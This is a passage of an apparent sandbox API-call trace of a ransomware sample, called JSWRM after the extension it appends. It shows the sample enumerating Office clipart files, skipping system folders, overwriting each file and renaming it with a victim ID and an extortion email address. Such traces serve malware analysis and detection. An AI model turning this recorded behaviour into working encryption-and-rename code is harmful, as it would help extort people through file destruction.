0x2411c8 [0091.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01148_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01148_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01148_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01148_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01148_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01148_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0091.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0091.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.660] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7992) returned 1 [0091.660] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f30) returned 0x205850 [0091.660] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f30, lpOverlapped=0x0) returned 1 [0091.662] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.662] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f30, lpOverlapped=0x0) returned 1 [0091.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.662] CloseHandle (hObject=0x314) returned 1 [0091.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0091.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0091.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0091.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0091.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0091.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0091.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.663] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01148_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01148_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0091.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0091.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0091.664] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1248, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01149_.WMF", cAlternateFileName="")) returned 1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2=".") returned 1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="..") returned 1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="...") returned 1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="windows") returned -1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="recovery") returned -1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="perflogs") returned -1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="documents and settings") returned 1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="system volume information") returned -1 [0091.664] lstrcmpiW (lpString1="NA01149_.WMF", lpString2="msocache") returned 1 [0091.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0091.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01149_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01149_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01149_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0091.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0091.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01149_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01149_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01149_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0091.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0091.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01149_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.665] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4680) returned 1 [0091.665] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1240) returned 0x205850 [0091.665] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1240, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1240, lpOverlapped=0x0) returned 1 [0091.667] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.667] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1240, lpOverlapped=0x0) returned 1 [0091.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.667] CloseHandle (hObject=0x314) returned 1 [0091.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0091.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0091.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0091.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0091.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0091.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0091.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01149_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01149_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0091.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0091.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.668] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2230, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01152_.WMF", cAlternateFileName="")) returned 1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2=".") returned 1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="..") returned 1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="...") returned 1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="windows") returned -1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="recovery") returned -1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="perflogs") returned -1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="documents and settings") returned 1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="system volume information") returned -1 [0091.668] lstrcmpiW (lpString1="NA01152_.WMF", lpString2="msocache") returned 1 [0091.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01152_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01152_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01152_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0091.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01152_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01152_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01152_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0091.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0091.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.669] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8752) returned 1 [0091.669] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2230) returned 0x205850 [0091.669] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2230, lpOverlapped=0x0) returned 1 [0091.671] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.671] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2230, lpOverlapped=0x0) returned 1 [0091.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.671] CloseHandle (hObject=0x314) returned 1 [0091.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0091.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0091.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0091.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0091.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0091.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0091.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.672] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01152_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01152_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0091.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0091.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0091.673] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01154_.WMF", cAlternateFileName="")) returned 1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2=".") returned 1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="..") returned 1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="...") returned 1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="windows") returned -1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="recovery") returned -1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="perflogs") returned -1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="documents and settings") returned 1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="system volume information") returned -1 [0091.673] lstrcmpiW (lpString1="NA01154_.WMF", lpString2="msocache") returned 1 [0091.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01154_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01154_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01154_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0091.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01154_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01154_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01154_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0091.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0091.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, 